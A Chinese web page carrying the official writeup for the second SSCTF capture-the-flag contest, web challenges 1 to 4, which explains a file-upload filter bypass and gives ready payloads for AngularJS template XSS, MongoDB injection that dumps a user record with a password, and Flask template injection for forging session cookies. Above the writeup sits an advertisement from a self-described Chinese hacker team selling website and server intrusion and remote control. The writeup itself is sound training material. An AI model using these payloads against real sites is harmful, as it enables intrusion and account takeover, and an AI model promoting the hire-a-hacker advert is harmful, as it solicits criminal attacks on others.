中国黑客业务团队承接一切网站入侵业务,服务器入侵业务,文件加密,文件解密,办公系统入侵,电脑远程控制等业务
联系我们:
技术支持
技术支持








第二届SSCTF网络攻防大赛官方Writeup

 

一、Web部分 1、Web 1 --- Up!Up!Up!
  • 分值:100

  • Flag:SSCTF{d750aa9eb742bde8c65bc525f596623a}

  • 题目链接: 

  • 该题目出题思路是来自于乌云的某个漏洞,链接

    将Content-Type内的内容进行大小写变换,filename改为*.php即可绕过检测。

    2、Web 2 --- Can You Hit Me?
  • 分值:200

  • Flag:SSCTF{4c138226180306f21ceb7e7ed1158f08}

  • 题目链接: 

  • 该题出题思路是Angluar JS的客户端模板的JS注入,只做了简单的过滤,直接让其二次输出为正常语句即可触发,将Payload发送到相应邮箱,审核通过之后就会发放Flag。

    ?xss={{%27a%27.coonnstructor.prototype.charAt=[].join;$evevalal(%22x=1}%20}%20};alealertrt(1)//%22);}}

    3、Web 3 --- Legend?Legend!
  • 分值:300

  • Flag:SSCTF{057ef83ac5e46d137a8941712d5fffc2}

  • 题目链接: 

  • 该题是MongoDB的注入,相关资料链接
    首先获取集合内容:

    ?newsid=2%27});return%20{title:tojson(db.getCollectionNames())};//

    得到集合名user,然后查询该集合内数据:

    ?newsid=2%27});return%20{title:tojson(db.user.find()[0])};//

    获得一个邮箱信息:

    { "_id" : ObjectId("56d30bfaea684f010e8b456d"), "username" : "admin", "password" : "*&98*hjhjyu", "email" : "loverctf@126.com" }

    登陆该邮箱,在已删除邮件中发现Flag。

    4、Web 4 --- Flag-Man
  • 分值:400

  • Flag:SSCTF{dc28c39697058241d924be06462c2040}

  • 题目链接: 

  • 该题是一个Flask框架注入, 相关资料链接
    使用GitHub的账户登录发现user取的是GitHub的Name,同时指定了Session,后端使用了Flask的Session
    我们可以拿到Secure_Key,然后对自己的Session进行签名,拿到签名后的session值,然后修改Cookie拿到Flag。

    修改GitHub Name为{{app. secret_key}}即可获得Secure_Key

    name:sflkgjsiotu2rjdskjfnpwq9rwrehnpqwd0i2ruruogh9723yrhbfnkdsjl

    然后将Flask的签名算法抠出来,进行自签名,得到ID为1的用户的session,相关代码如下(见附件Web04/Poc.py)

    [1] [2] [3] [4] [5] [6] [7] [8]  下一页